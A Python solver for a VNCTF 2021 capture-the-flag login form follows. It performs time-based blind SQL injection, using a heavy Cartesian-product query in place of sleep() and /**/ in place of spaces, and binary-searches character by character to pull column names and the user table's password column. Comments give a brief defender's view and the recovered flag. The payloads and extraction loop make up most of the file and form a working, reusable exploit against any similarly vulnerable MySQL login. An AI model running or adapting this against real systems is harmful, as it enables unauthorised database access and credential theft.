笛卡尔积注入
# Time-based blind SQL injection solver for a CTF login form (VNCTF 2021 instance).
#
# How the oracle works, as far as the payloads below show:
#   * The injected condition is `if(<char test>, 1, 0) AND (<heavy query>)`.
#   * The heavy query is a count(*) over a three-way self-join (Cartesian product)
#     of information_schema.tables. It stands in for sleep()/benchmark().
#   * With AND, the expensive sub-select only delays the response when the
#     character test is true (presumably the server short-circuits otherwise).
#     The script reads that delay as a client-side ReadTimeout after 1 second.
#   * `/**/` is used everywhere a space would go, presumably because the target
#     filters whitespace - the page does not show the filter itself.
#
# Defender's view: the root cause is the `password` POST field reaching the SQL
# statement unparameterised. Signs of this traffic are bursts of login POSTs
# whose body contains `information_schema` / `/**/`, paired with unusually
# long-running count(*) queries on the database side.
import requests

url = "http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"


def _delayed(payload):
    """Send one login attempt carrying `payload` in the password field.

    Returns True when the response takes longer than the 1 s read timeout
    (condition judged true), False when the server answers in time, and None
    for any other request error (the caller leaves its state untouched).
    """
    try:
        requests.post(url, data={'username': 'admin', 'password': payload}, timeout=1)
    except requests.exceptions.ReadTimeout:
        return True
    except Exception:
        # NOTE(review): every non-timeout failure is swallowed, so a persistent
        # connection error makes the caller repeat the same guess indefinitely.
        return None
    return False


flag = ''
for pos in range(1, 50):
    before = flag
    hi = 127
    lo = 33  # search is limited to ASCII codes 33..127
    while lo <= hi:
        guess = (hi + lo) // 2

        # Earlier stage kept by the author (column names of table `user`):
        # eq_probe="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(pos,guess)
        # gt_probe="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(pos,guess)

        # Active stage: test character `pos` of the concatenated password column.
        eq_probe = "admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(pos, guess)
        gt_probe = "admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(pos, guess)

        print(pos, guess)
        exact = _delayed(eq_probe)
        if exact is True:
            # Equality probe timed out: this character is settled.
            flag += chr(guess)
            print(flag)
            break
        if exact is None:
            # Request failed for another reason; bounds stay as they are.
            continue

        above = _delayed(gt_probe)
        if above is True:
            lo = guess + 1
        elif above is False:
            hi = guess - 1
        # above is None: leave bounds unchanged, same guess is tried again.

    # Nothing was appended for this position, so the value has ended.
    if flag == before:
        break

# Author's notes, apparently the values recovered at each stage:
#   table:   user
#   columns: id,username,password
#   value:   no_0ne_kn0w_th1s
